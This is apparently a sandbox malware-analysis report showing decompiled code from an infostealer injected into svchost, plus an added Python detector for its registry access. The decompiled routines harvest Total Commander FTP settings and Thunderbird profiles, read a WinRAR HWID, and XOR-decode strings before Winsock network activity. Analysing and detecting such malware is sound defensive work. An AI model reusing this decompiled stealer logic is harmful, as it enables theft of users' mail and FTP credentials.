                                                                                                                                        				_t34 = E0BC08EBD(0x80000001, "Software\\Ghisler\\Total Commander", _t60, 0); // executed
                                                                                                                                        				_t79 = _t34;
                                                                                                                                        				_t86 = _t85 + 0x20;
                                                                                                                                        				if(_t34 != 0) {
                                                                                                                                        					E0BC042B1(_a4, _t79);
                                                                                                                                        					E0BC08D3D(_t79);
                                                                                                                                        					_t86 = _t86 + 0xc;
                                                                                                                                        				}
                                                                                                                                        				_t35 = E0BC08DDA(0x80000002, 0x80000002, "Software\\Ghisler\\Windows Commander", _t72, 0, 0); // executed
                                                                                                                                        				E0BC042C9(_t67, _a4, _t35);
                                                                                                                                        				_t37 = E0BC08DDA(0x80000002, 0x80000002, "Software\\Ghisler\\Windows Commander", _t60, 0, 0); // executed
                                                                                                                                        				_t87 = _t86 + 0x30;
                                                                                                                                        				_v8 = _t37;
                                                                                                                                        				if(_t37 != 0) {
                                                                                                                                        					E0BC042B1(_a4, _t37);
                                                                                                                                        					E0BC08D3D(_v8);
                                                                                                                                        					_t87 = _t87 + 0xc;
                                                                                                                                        				}
                                                                                                                                        				_t38 = E0BC08DDA(0x80000002, 0x80000002, "Software\\Ghisler\\Total Commander", _t72, 0, 0); // executed
                                                                                                                                        				E0BC042C9(_t67, _a4, _t38);
                                                                                                                                        				_t40 = E0BC08DDA(0x80000002, 0x80000002, "Software\\Ghisler\\Total Commander", _t60, 0, 0); // executed
                                                                                                                                        				_t81 = _t40;
                                                                                                                                        				_t99 = _t81;
                                                                                                                                        				if(_t81 != 0) {
                                                                                                                                        					E0BC042B1(_a4, _t81);
                                                                                                                                        					E0BC08D3D(_t81);
                                                                                                                                        				}
                                                                                                                                        				return E0BC08D0C(_a4, _v12, _t99);
                                                                                                                                        			}
                                                                                                                                        0x0bc04422
                                                                                                                                        0x0bc04423
                                                                                                                                        0x0bc04425
                                                                                                                                        0x0bc0442c
                                                                                                                                        0x0bc0442e
                                                                                                                                        0x0bc04433
                                                                                                                                        0x0bc0443c
                                                                                                                                        0x0bc0443f
                                                                                                                                        0x0bc0444a
                                                                                                                                        0x0bc0444e
                                                                                                                                        0x0bc04456
                                                                                                                                        0x0bc04467
                                                                                                                                        0x0bc0445c
                                                                                                                                        0x0bc0445e
                                                                                                                                        0x0bc04463
                                                                                                                                        0x0bc0446c
                                                                                                                                        0x0bc0446f
                                                                                                                                        0x0bc04476
                                                                                                                                        0x0bc0447d
                                                                                                                                        0x0bc04482
                                                                                                                                        0x0bc04485
                                                                                                                                        0x0bc0448c
                                                                                                                                        0x0bc04497
                                                                                                                                        0x0bc0449c
                                                                                                                                        0x0bc0449c
                                                                                                                                        0x0bc044a1
                                                                                                                                        0x0bc044a6
                                                                                                                                        0x0bc044a9
                                                                                                                                        0x0bc044b4
                                                                                                                                        0x0bc044b9
                                                                                                                                        0x0bc044b9
                                                                                                                                        0x0bc044be
                                                                                                                                        0x0bc044c3
                                                                                                                                        0x0bc044c6
                                                                                                                                        0x0bc044d1
                                                                                                                                        0x0bc044d6
                                                                                                                                        0x0bc044d6
                                                                                                                                        0x0bc044db
                                                                                                                                        0x0bc044ed
                                                                                                                                        0x0bc044f4
                                                                                                                                        0x0bc044fb
                                                                                                                                        0x0bc04508
                                                                                                                                        0x0bc0450d
                                                                                                                                        0x0bc04510
                                                                                                                                        0x0bc04515
                                                                                                                                        0x0bc0451b
                                                                                                                                        0x0bc04523
                                                                                                                                        0x0bc04528
                                                                                                                                        0x0bc04528
                                                                                                                                        0x0bc04535
                                                                                                                                        0x0bc0453e
                                                                                                                                        0x0bc0454d
                                                                                                                                        0x0bc04552
                                                                                                                                        0x0bc04554
                                                                                                                                        0x0bc04559
                                                                                                                                        0x0bc0455f
                                                                                                                                        0x0bc04565
                                                                                                                                        0x0bc0456a
                                                                                                                                        0x0bc0456a
                                                                                                                                        0x0bc0457d
                                                                                                                                        0x0bc04586
                                                                                                                                        0x0bc04596
                                                                                                                                        0x0bc0459b
                                                                                                                                        0x0bc0459e
                                                                                                                                        0x0bc045a3
                                                                                                                                        0x0bc045a9
                                                                                                                                        0x0bc045b1
                                                                                                                                        0x0bc045b6
                                                                                                                                        0x0bc045b6
                                                                                                                                        0x0bc045c5
                                                                                                                                        0x0bc045ce
                                                                                                                                        0x0bc045da
                                                                                                                                        0x0bc045df
                                                                                                                                        0x0bc045e4
                                                                                                                                        0x0bc045e6
                                                                                                                                        0x0bc045ec
                                                                                                                                        0x0bc045f2
                                                                                                                                        0x0bc045f7
                                                                                                                                        0x0bc04609

                                                                                                                                        APIs
                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000002), ref: 0BC0443F
                                                                                                                                        • GetWindowsDirectoryA.KERNEL32(00000000,00000104), ref: 0BC0444E
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocDirectoryLocalWindows
                                                                                                                                        • String ID: FtpIniName$InstallDir$Software\Ghisler\Total Commander$Software\Ghisler\Windows Commander$\GHISLER
                                                                                                                                        • API String ID: 3186838798-3636168975
                                                                                                                                        • Opcode ID: f581d20579595f867798c103eeeeeae1100bec8776cd730423ee736f86d11e92
                                                                                                                                        • Instruction ID: 9d5b5651ce8c2ee33801ce76a997941d73e6297f60b8cfd11730c92acb66ef4e
                                                                                                                                        • Opcode Fuzzy Hash: f581d20579595f867798c103eeeeeae1100bec8776cd730423ee736f86d11e92
                                                                                                                                        • Instruction Fuzzy Hash: 0D41D1B1B713113EEA1537A08C47FAF296D8F61B91F008524BF05BA2C1EEB58E41A5F1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 1.18%

                                                                                                                                        Control-flow Graph

                                                                                                                                        C-Code - Quality: 62%
			E0BC099B0(intOrPtr* __ebx, void* __edx) {
				signed int _v8;
				char _v272;
				void* _v276;
				intOrPtr _v280;
				void* _v284;
				intOrPtr _v288;
				void* __edi;
				void* __esi;
				signed int _t19;
				intOrPtr _t21;
				intOrPtr _t22;
				long _t26;
				void* _t28;
				intOrPtr _t31;
				void* _t32;
				intOrPtr* _t34;
				void** _t38;
				void* _t39;
				intOrPtr* _t46;
				void* _t51;
				void* _t54;
				void* _t56;
				CHAR* _t58;
				intOrPtr _t59;
				signed int _t60;

				_t54 = __edx;
				_t46 = __ebx; // out-parameter: receives the length of the returned buffer (see *_t46 below)
				_t19 =  *0xbc10000; // 0xbb40e64e, the /GS security cookie; _v8 is the stack canary verified in E0BC09FDC on return
				_v8 = _t19 ^ _t60;
				_t21 =  *0xbc10010; // 0x80000001 = HKEY_CURRENT_USER
				_t55 = "HWID";
				_t22 = E0BC08EBD(_t21, "Software\\WinRAR", "HWID", __ebx); // executed; registry lookup of HKCU\Software\WinRAR\HWID (inferred from the hive constant and key/value names; the helper body is not in this listing)
				_v288 = _t22;
				if(_t22 != 0) {
					L14:
					return E0BC09FDC(_v288, _t46, _v8 ^ _t60, _t54, _t55, _t56); // canary check, then return the HWID buffer
				}
				_push(_t56);
				_t26 = GetTempPathA(0x104,  &_v272); // registry miss: fall back to a file named HWID in %TEMP%
				if(_t26 == 0 || _t26 > 0x104) { // call failed or the path does not fit the MAX_PATH buffer
					L13:
					_pop(_t56);
					goto L14;
				} else {
					__imp__CreateStreamOnHGlobal(0, 1,  &_v276); // memory-backed IStream; fDeleteOnRelease = 1
					_t58 =  &_v272;
					_t28 = E0BC08F95(_t58); // subcall runs lstrlenA on the temp path (interpretation: decides whether a separator is needed)
					_push(_t58);
					if(_t28 != 0) {
						_t31 = E0BC08EE2("HWID"); // concatenation helper (lstrcpyA/lstrcatA): <temp path> + "HWID"
					} else {
						_t31 = E0BC08F32(E0BC08EE2("//"), "HWID"); // same, with "//" inserted before "HWID"
					}
					_v280 = _t31; // heap string holding the file path; freed by E0BC08D3D below
					_t32 = E0BC08A86(_t46, _v276, _t54, _t31); // interpretation: loads the HWID file into the stream
					_pop(_t51);
					if(_t32 != 0) {
						_t59 = E0BC089A1(_v276, _t51); // interpretation: size of the stream contents
						if(_t59 != 0) {
							_t38 =  &_v284;
							__imp__GetHGlobalFromStream(_v276, _t38);
							if(_t38 >= 0) {
								_t39 = GlobalLock(_v284);
								_t55 = _t39;
								if(_t39 != 0) {
									_v288 = E0BC08D51(_t59); // allocate _t59 bytes for the result
									E0BC08D91(_t55, _t41, _t59); // copy the locked HGLOBAL contents into it (_t41 is left undefined by the decompiler)
									GlobalUnlock(_v284);
									 *_t46 = _t59; // report the length through the __ebx out-parameter
								}
							}
						}
					}
					E0BC08D3D(_v280); // free the path string
					_t34 = _v276;
					if(_t34 != 0) {
						 *((intOrPtr*)( *_t34 + 8))(_t34); // vtable slot at offset 8 = IUnknown::Release on the IStream
					}
					goto L13;
				}
			}

                                                                                                                                         Address gutter of the listing above (one address per decompiled statement, 0x0bc099b0 to 0x0bc09af3, 55 entries; the gutter is omitted here because it cannot be re-aligned with the statements)

                                                                                                                                        APIs
                                                                                                                                        • GetTempPathA.KERNEL32(00000104,?,00000000,?,?,?), ref: 0BC099F9
                                                                                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?), ref: 0BC09A1A
                                                                                                                                          • Part of subcall function 0BC08F95: lstrlenA.KERNEL32(?,0BC09A2B,?,?,?), ref: 0BC08F9F
                                                                                                                                        • GetHGlobalFromStream.OLE32(?,?,?,?,?), ref: 0BC09A85
                                                                                                                                        • GlobalLock.KERNEL32 ref: 0BC09A95
                                                                                                                                        • GlobalUnlock.KERNEL32(?,00000000,00000000,00000000,?,?,?), ref: 0BC09ABC
                                                                                                                                          • Part of subcall function 0BC08EE2: lstrlenA.KERNEL32(00000000,HWID,?,?), ref: 0BC08F07
                                                                                                                                          • Part of subcall function 0BC08EE2: lstrlenA.KERNEL32(HWID), ref: 0BC08F0C
                                                                                                                                          • Part of subcall function 0BC08EE2: lstrcpyA.KERNEL32(00000000,00000000), ref: 0BC08F1D
                                                                                                                                          • Part of subcall function 0BC08EE2: lstrcatA.KERNEL32(00000000,HWID), ref: 0BC08F25
                                                                                                                                          • Part of subcall function 0BC08F32: lstrlenA.KERNEL32(00000000,HWID,?,?,?,0BC09A43), ref: 0BC08F58
                                                                                                                                          • Part of subcall function 0BC08F32: lstrlenA.KERNEL32(00000000,?,0BC09A43), ref: 0BC08F5F
                                                                                                                                          • Part of subcall function 0BC08F32: lstrcpyA.KERNEL32(00000000,00000000,?,0BC09A43), ref: 0BC08F70
                                                                                                                                          • Part of subcall function 0BC08F32: lstrcatA.KERNEL32(00000000,00000000,?,0BC09A43), ref: 0BC08F7A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlen$Global$Streamlstrcatlstrcpy$CreateFromLockPathTempUnlock
                                                                                                                                        • String ID: HWID$Software\WinRAR
                                                                                                                                        • API String ID: 4065236511-3334689248
                                                                                                                                        • Opcode ID: 7c2315638ea35df90035e141b3820e9b568c52b040351f45abc37a76d879729e
                                                                                                                                        • Instruction ID: ecb0298cdaff28f65b60e7f48c18ee53045aed45977dfab0fc6a63362085cb30
                                                                                                                                        • Opcode Fuzzy Hash: 7c2315638ea35df90035e141b3820e9b568c52b040351f45abc37a76d879729e
                                                                                                                                        • Instruction Fuzzy Hash: 1D318071A301299BCB25EB68DC46BDA77F9AF49700F0445A5E509E71C0DEB0CE80EFA0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 1.23%

                                                                                                                                        C-Code - Quality: 97%
			E0BC06E59(void* __eflags, intOrPtr _a4) {
				signed int _v8;
				char _v276;
				intOrPtr _v280;
				intOrPtr _v284;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				void* _t40;
				signed int _t43;

				_t49 = __eflags;
				_t16 =  *0xbc10000; // 0xbb40e64e, the /GS security cookie (same canary scheme as E0BC099B0)
				_v8 = _t16 ^ _t43;
				_v280 = _a4;
				_v284 = E0BC08C9C(_a4, _t40, __eflags, 0x5f);
				 *0xbc10d54 = 2; // global counter set before each harvesting pass (2 for the first pass, 3 for the second)
				GetCurrentDirectoryA(0x104,  &_v276); // save the working directory; the pass below changes it and it is restored afterwards
				_t41 = "\\Thunderbird";
				_t34 = "Thunderbird";
				_t42 = "Software\\Mozilla";
				E0BC0689E(_t40, _v280, 0x80000001, "Software\\Mozilla", "Thunderbird", "\\Thunderbird"); // executed; 0x80000001 = HKEY_CURRENT_USER
				E0BC0689E(_t40, _v280, 0x80000002, "Software\\Mozilla", "Thunderbird", "\\Thunderbird"); // executed; 0x80000002 = HKEY_LOCAL_MACHINE
				SetCurrentDirectoryA( &_v276);
				 *0xbc10d54 = 3;
				GetCurrentDirectoryA(0x104,  &_v276);
				E0BC0689E(_t40, _v280, 0x80000001, _t42, _t34, _t41); // executed; second pass, shown by the decompiler with the same three strings
				E0BC0689E(_t40, _v280, 0x80000002, _t42, _t34, _t41); // executed
				SetCurrentDirectoryA( &_v276);
				return E0BC09FDC(E0BC08D0C(_v280, _v284, _t49), _v284, _v8 ^ _t43, _t40, _t41, _t42); // canary check and return
			}

                                                                                                                                        APIs
                                                                                                                                        • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 0BC06E9C
                                                                                                                                          • Part of subcall function 0BC0689E: StrStrIA.SHLWAPI(?,?), ref: 0BC068B0
                                                                                                                                          • Part of subcall function 0BC0689E: LocalAlloc.KERNEL32(00000040,00000880), ref: 0BC06928
                                                                                                                                          • Part of subcall function 0BC0689E: RegOpenKeyA.ADVAPI32(?,?,?), ref: 0BC0693D
                                                                                                                                          • Part of subcall function 0BC0689E: RegEnumKeyExA.KERNELBASE(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0BC069C2
                                                                                                                                          • Part of subcall function 0BC0689E: RegCloseKey.KERNELBASE(?), ref: 0BC069CC
                                                                                                                                        • SetCurrentDirectoryA.KERNEL32(?), ref: 0BC06EE4
                                                                                                                                        • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 0BC06F00
                                                                                                                                        • SetCurrentDirectoryA.KERNEL32(?), ref: 0BC06F39
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp, Offset: 0BC00000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_bc00000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CurrentDirectory$AllocCloseEnumLocalOpen
                                                                                                                                        • String ID: Software\Mozilla$Thunderbird$\Thunderbird
                                                                                                                                        • API String ID: 763207988-138716004
                                                                                                                                        • Opcode ID: 251bf2fb4ba5df433b19c9b169f52eb32d41e96274c08cb764b07ff3fe951c08
                                                                                                                                        • Instruction ID: 7fca3ecff15df8cf28386c3d5cea13775a3f5ce74b388604fd50f58f6b846da5
                                                                                                                                        • Opcode Fuzzy Hash: 251bf2fb4ba5df433b19c9b169f52eb32d41e96274c08cb764b07ff3fe951c08
                                                                                                                                        • Instruction Fuzzy Hash: 39217CB1D2111CABDB24EB14DC4BFDB7BBCEB45705F4005A8B60AA2181DA709E94CBB1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.10%
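The routine above reads HKCU\Software\Mozilla and HKLM\Software\Mozilla from inside an injected svchost.exe (the memory dump source is the svchost snapshot), which is the behavioural trace a hunt can key on: a system process has no reason to enumerate a mail client's profile keys. The following is an added example of that detection, not code from the Joe Sandbox report or from the sample; it runs over constructed Procmon-style CSV export lines (the only fields used are Process Name, PID, Operation and Path, which Procmon does emit), and the list of images allowed to touch Mozilla keys is an assumption to be tuned per environment. The hive constants, key path and subkey name are the ones visible in the decompilation.

```python
"""
Flag registry access to Mozilla/Thunderbird profile keys by processes that have
no business reading them, mirroring the lookup the decompiled routine performs:
open <hive>\Software\Mozilla, enumerate subkeys, case-insensitive match on
"Thunderbird", for both HKCU (0x80000001) and HKLM (0x80000002).
Added example; the log lines below are constructed, not captured from the sample.
"""
import csv
import io
import re

# Hive constants passed to E0BC0689E in the decompiled code.
HIVES = {0x80000001: "HKCU", 0x80000002: "HKLM"}

# Strings from the report's String ID line.
MOZILLA_KEY = r"Software\Mozilla"
PRODUCT = "Thunderbird"

# Images that legitimately read Mozilla keys. Assumption for this example; tune per estate.
ALLOWED_IMAGES = {"thunderbird.exe", "firefox.exe", "explorer.exe", "msiexec.exe"}

# Procmon operations that correspond to RegOpenKeyA / RegEnumKeyExA and friends.
REGISTRY_OPS = {"RegOpenKey", "RegEnumKey", "RegQueryKey", "RegQueryValue"}

# <hive>\Software\Mozilla with an optional single subkey component.
_KEY_RE = re.compile(r"^(HKCU|HKLM)\\Software\\Mozilla(\\[^\\]+)?", re.IGNORECASE)


def stealer_key_paths():
    """(hive, path) pairs the decompiled routine ends up querying, in call order."""
    return [(HIVES[h], MOZILLA_KEY + "\\" + PRODUCT) for h in (0x80000001, 0x80000002)]


def classify(row):
    """Return a finding for one Procmon row that matches the access pattern, else None."""
    op = row["Operation"]
    if op not in REGISTRY_OPS:
        return None
    m = _KEY_RE.match(row["Path"])
    if not m:
        return None
    image = row["Process Name"].lower()
    if image in ALLOWED_IMAGES:
        return None
    subkey = (m.group(2) or "").lstrip("\\")
    # Same test the sample applies with StrStrIA: substring match, case-insensitive.
    thunderbird_match = PRODUCT.lower() in subkey.lower()
    return {
        "pid": int(row["PID"]),
        "image": image,
        "hive": m.group(1).upper(),
        "op": op,
        "path": row["Path"],
        "thunderbird_match": thunderbird_match,
    }


def scan(procmon_csv):
    """Run classify() over a Procmon CSV export held in a string."""
    return [f for f in (classify(r) for r in csv.DictReader(io.StringIO(procmon_csv))) if f]


def summarize(findings):
    """Group by PID. A process that walks both hives and hits a Thunderbird subkey reproduces the stealer's pattern."""
    by_pid = {}
    for f in findings:
        s = by_pid.setdefault(f["pid"], {"image": f["image"], "hives": set(), "thunderbird": False})
        s["hives"].add(f["hive"])
        s["thunderbird"] = s["thunderbird"] or f["thunderbird_match"]
    for s in by_pid.values():
        s["stealer_pattern"] = s["hives"] == {"HKCU", "HKLM"} and s["thunderbird"]
    return by_pid


# Constructed sample in Procmon CSV export format (not captured from the sample).
SAMPLE_LOG = """\
"Time of Day","Process Name","PID","Operation","Path","Result"
"10:01:02.100","svchost.exe","1732","RegOpenKey","HKCU\\Software\\Mozilla","SUCCESS"
"10:01:02.101","svchost.exe","1732","RegEnumKey","HKCU\\Software\\Mozilla","SUCCESS"
"10:01:02.102","svchost.exe","1732","RegOpenKey","HKCU\\Software\\Mozilla\\Mozilla Thunderbird","SUCCESS"
"10:01:02.103","svchost.exe","1732","RegOpenKey","HKLM\\Software\\Mozilla","NAME NOT FOUND"
"10:01:05.000","thunderbird.exe","4120","RegOpenKey","HKCU\\Software\\Mozilla\\Mozilla Thunderbird","SUCCESS"
"10:01:06.000","svchost.exe","1732","RegOpenKey","HKLM\\System\\CurrentControlSet\\Services","SUCCESS"
"""

if __name__ == "__main__":
    for pid, s in summarize(scan(SAMPLE_LOG)).items():
        print(pid, s["image"], sorted(s["hives"]), "stealer_pattern" if s["stealer_pattern"] else "")
```

The "NAME NOT FOUND" HKLM row is kept on purpose: the sample queries both hives unconditionally, so the failed HKLM open is part of the signature rather than noise, and requiring both hives plus a Thunderbird subkey hit keeps an installer or browser that only touches its own key out of the alert.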

                                                                                                                                        C-Code - Quality: 76%
                                                                                                                                        			E0BC01153(signed char __edx) {
                                                                                                                                        				signed int _v8;
                                                                                                                                        				char _v412;
                                                                                                                                        				void* _v416;
                                                                                                                                        				void* _v420;
                                                                                                                                        				void* _v424;
                                                                                                                                        				intOrPtr _v428;
                                                                                                                                        				void* _v432;
                                                                                                                                        				void* _v436;
                                                                                                                                        				intOrPtr _v440;
                                                                                                                                        				void* _v444;
                                                                                                                                        				intOrPtr _v448;
                                                                                                                                        				char _v460;
                                                                                                                                        				void* __ebx;
                                                                                                                                        				void* __edi;
                                                                                                                                        				void* __esi;
                                                                                                                                        				signed int _t70;
                                                                                                                                        				void* _t73;
                                                                                                                                        				void* _t78;
                                                                                                                                        				intOrPtr* _t79;
                                                                                                                                        				void* _t84;
                                                                                                                                        				intOrPtr* _t88;
                                                                                                                                        				intOrPtr _t90;
                                                                                                                                        				void* _t95;
                                                                                                                                        				intOrPtr _t99;
                                                                                                                                        				intOrPtr _t102;
                                                                                                                                        				void* _t104;
                                                                                                                                        				signed int _t114;
                                                                                                                                        				void* _t115;
                                                                                                                                        				signed char _t118;
                                                                                                                                        				void* _t119;
                                                                                                                                        				signed char* _t131;
                                                                                                                                        				signed char _t132;
                                                                                                                                        				intOrPtr _t133;
                                                                                                                                        				intOrPtr* _t134;
                                                                                                                                        				signed int _t136;
                                                                                                                                        				void* _t137;
                                                                                                                                        				void* _t138;
                                                                                                                                        
                                                                                                                                        				_t132 = __edx;
                                                                                                                                        				_t70 =  *0xbc10000; // 0xbb40e64e
                                                                                                                                        				_v8 = _t70 ^ _t136;
                                                                                                                                        				_t115 = 0;
                                                                                                                                        				_v432 = 0;
                                                                                                                                        				_v436 = 0;
                                                                                                                                         				__imp__#115(0x101,  &_v412); // executed -- ws2_32 ordinal 115 is WSAStartup: request Winsock 1.1 (0x101), WSADATA at _v412
                                                                                                                                         				_t73 = LocalAlloc(0x40, 0x8c); // 0x40 = LMEM_ZEROINIT; 0x8c-byte block stored in the global at 0xbc10d68
                                                                                                                                         				 *0xbc10d68 = _t73;
                                                                                                                                         				 *(_t73 + 4) = _t73; // first two dwords point back at the block itself (self-referencing, i.e. an empty list head)
                                                                                                                                         				 *_t73 = _t73;
                                                                                                                                         				E0BC08D5E( &_v460,  &_v460, 0, 0x30); // zero the 0x30-byte array at _v460 (memset-style helper, 12 dword slots)
                                                                                                                                         				_t134 = 0xbc108d0;
                                                                                                                                         				_t138 =  *0xbc108d0 - _t115; // 0x25 -- global compared against zero (0x25 at dump time)
                                                                                                                                         				if(_t138 == 0) {
                                                                                                                                         					L9:
                                                                                                                                         					_t135 = __imp__CreateStreamOnHGlobal;
                                                                                                                                         					 *_t135(_t115, 1,  &_v432); // executed -- CreateStreamOnHGlobal(NULL, fDeleteOnRelease = TRUE, &stream): fresh HGLOBAL-backed IStream
                                                                                                                                        					_t119 = _v432;
                                                                                                                                        					if(_t119 != _t115) {
                                                                                                                                        						L11:
                                                                                                                                        						_t135 = _t119; // executed
                                                                                                                                        						_t78 = E0BC01431(_t119, _t132, _t142); // executed
                                                                                                                                        						_t143 = _t78 - _t115;
                                                                                                                                        						if(_t78 != _t115) {
                                                                                                                                        							L14:
                                                                                                                                        							if(_v460 == _t115) {
                                                                                                                                        								L35:
                                                                                                                                        								_t79 = _v432;
                                                                                                                                        								__eflags = _t79 - _t115;
                                                                                                                                        								if(_t79 != _t115) {
                                                                                                                                         									 *((intOrPtr*)( *_t79 + 8))(_t79); // vtable slot at +8 is IUnknown::Release on the stream
                                                                                                                                        								}
                                                                                                                                        								L37:
                                                                                                                                        								__eflags = _v8 ^ _t136;
                                                                                                                                        								return E0BC09FDC(_v436, _t115, _v8 ^ _t136, _t132, _t133, _t135);
                                                                                                                                        							}
                                                                                                                                        							_v420 =  &_v460;
                                                                                                                                        							do {
                                                                                                                                         								_v428 = 8; // retry budget per entry: up to 8 attempts
                                                                                                                                        								while(1) {
                                                                                                                                        									_t84 = _v432;
                                                                                                                                        									_v416 = _t115;
                                                                                                                                        									_v440 = _t84;
                                                                                                                                        									_v424 = _t115;
                                                                                                                                        									if(_t84 == _t115) {
                                                                                                                                        										goto L31;
                                                                                                                                        									}
                                                                                                                                        									L18:
                                                                                                                                        									__imp__GetHGlobalFromStream(_t84,  &_v444);
                                                                                                                                        									if(_t84 >= 0) {
                                                                                                                                        										_t133 = E0BC089A1(_v440,  &_v444);
                                                                                                                                        										_t95 = GlobalLock(_v444);
                                                                                                                                        										_t135 = _t95;
                                                                                                                                        										if(_t95 != _t115) {
                                                                                                                                        											_v424 = _t115;
                                                                                                                                        											_v416 = _t115;
                                                                                                                                        											_t99 = E0BC01BF7( *_v420, _t135, _t133,  &_v416,  &_v424); // executed
                                                                                                                                        											_t137 = _t137 + 0x14;
                                                                                                                                        											if(_v424 != _t115) {
                                                                                                                                        												_t102 = E0BC01BF7(_v424, _t135, _t133,  &_v416, _t115);
                                                                                                                                        												_t137 = _t137 + 0x14;
                                                                                                                                        												_v448 = _t102;
                                                                                                                                        												E0BC08D3D(_v424);
                                                                                                                                        												_t99 = _v448;
                                                                                                                                        											}
                                                                                                                                        											_v424 = _t99;
                                                                                                                                        											GlobalUnlock(_v444);
                                                                                                                                        										}
                                                                                                                                        									}
                                                                                                                                        									E0BC08B27(_v440);
                                                                                                                                        									if(_v424 == _t115) {
                                                                                                                                        										L28:
                                                                                                                                        										_t88 = _v416;
                                                                                                                                        										if(_t88 != _t115) {
                                                                                                                                        											 *((intOrPtr*)( *_t88 + 8))(_t88);
                                                                                                                                        										}
                                                                                                                                        										if(_v436 != _t115) {
                                                                                                                                        											L33:
                                                                                                                                         											_v420 = _v420 + 4; // advance to the next dword entry of the _v460 array
                                                                                                                                        											__eflags = _v436 - _t115;
                                                                                                                                        											if(_v436 != _t115) {
                                                                                                                                        												goto L35;
                                                                                                                                        											}
                                                                                                                                        											break;
                                                                                                                                        										} else {
                                                                                                                                        											goto L31;
                                                                                                                                        										}
                                                                                                                                        									} else {
                                                                                                                                        										if(_v416 == _t115) {
                                                                                                                                        											goto L31;
                                                                                                                                        										}
                                                                                                                                        										_t90 = E0BC010D8(_t135, _v416);
                                                                                                                                        										_v436 = _t90;
                                                                                                                                        										if(_t90 == _t115 && E0BC0973A(_v416, _t132) != 0) {
                                                                                                                                        											_v436 = E0BC010D8(_t135, _v416);
                                                                                                                                        										}
                                                                                                                                        										goto L28;
                                                                                                                                        									}
                                                                                                                                        									L31:
                                                                                                                                        									if(_v428 == _t115) {
                                                                                                                                        										goto L33;
                                                                                                                                        									}
                                                                                                                                        									_v428 = _v428 - 1;
                                                                                                                                        									Sleep(0x2ee0);
                                                                                                                                        									_t84 = _v432;
                                                                                                                                        									_v416 = _t115;
                                                                                                                                        									_v440 = _t84;
                                                                                                                                        									_v424 = _t115;
                                                                                                                                        									if(_t84 == _t115) {
                                                                                                                                        										goto L31;
                                                                                                                                        									}
                                                                                                                                        									goto L18;
                                                                                                                                        								}
                                                                                                                                        								__eflags =  *_v420 - _t115;
                                                                                                                                        							} while ( *_v420 != _t115);
                                                                                                                                        							goto L35;
                                                                                                                                        						}
                                                                                                                                        						_t104 = E0BC01431(_t135, _t132, _t143);
                                                                                                                                        						_t144 = _t104 - _t115;
                                                                                                                                        						if(_t104 != _t115 || E0BC01431(_t135, _t132, _t144) != _t115) {
                                                                                                                                        							goto L14;
                                                                                                                                        						} else {
                                                                                                                                        							goto L35;
                                                                                                                                        						}
                                                                                                                                        					}
                                                                                                                                        					 *_t135(_t115, 1,  &_v432);
                                                                                                                                        					_t119 = _v432;
                                                                                                                                        					_t142 = _t119 - _t115;
                                                                                                                                        					if(_t119 == _t115) {
                                                                                                                                        						goto L37;
                                                                                                                                        					}
                                                                                                                                        					goto L11;
                                                                                                                                        				} else {
                                                                                                                                        					_v420 =  &_v460;
                                                                                                                                        					do {
                                                                                                                                        						_v428 =  *_t134;
                                                                                                                                        						_t133 = E0BC08D51( *_t134);
                                                                                                                                        						if(_t133 != _t115) {
                                                                                                                                        							_t132 = 0;
                                                                                                                                        							__eflags = _v428 - _t115;
                                                                                                                                        							if(__eflags <= 0) {
                                                                                                                                        								goto L8;
                                                                                                                                        							}
                                                                                                                                        							_t114 = _t134 - _t133;
                                                                                                                                        							__eflags = _t114;
                                                                                                                                        							do {
                                                                                                                                        								_t131 = _t132 + _t133;
                                                                                                                                        								_t13 =  &(_t131[4]); // 0x6065667b
                                                                                                                                        								_t118 = _t13[_t114] ^ _t132 ^ 0x00000013;
                                                                                                                                        								_t132 = _t132 + 1;
                                                                                                                                        								 *_t131 = _t118;
                                                                                                                                        								__eflags = _t132 - _v428;
                                                                                                                                        							} while (_t132 < _v428);
                                                                                                                                        							_t115 = 0;
                                                                                                                                        							__eflags = 0;
                                                                                                                                        						} else {
                                                                                                                                        							_t133 = 0;
                                                                                                                                        						}
                                                                                                                                        						L8:
                                                                                                                                        						_v420 = _v420 + 4;
                                                                                                                                        						 *_v420 = _t133;
                                                                                                                                        						_t19 =  *_t134 + 4; // 0x6065667b
                                                                                                                                        						_t134 = _t134 + _t19;
                                                                                                                                        					} while ( *_t134 != _t115);
                                                                                                                                        					goto L9;
                                                                                                                                        				}
                                                                                                                                        			}
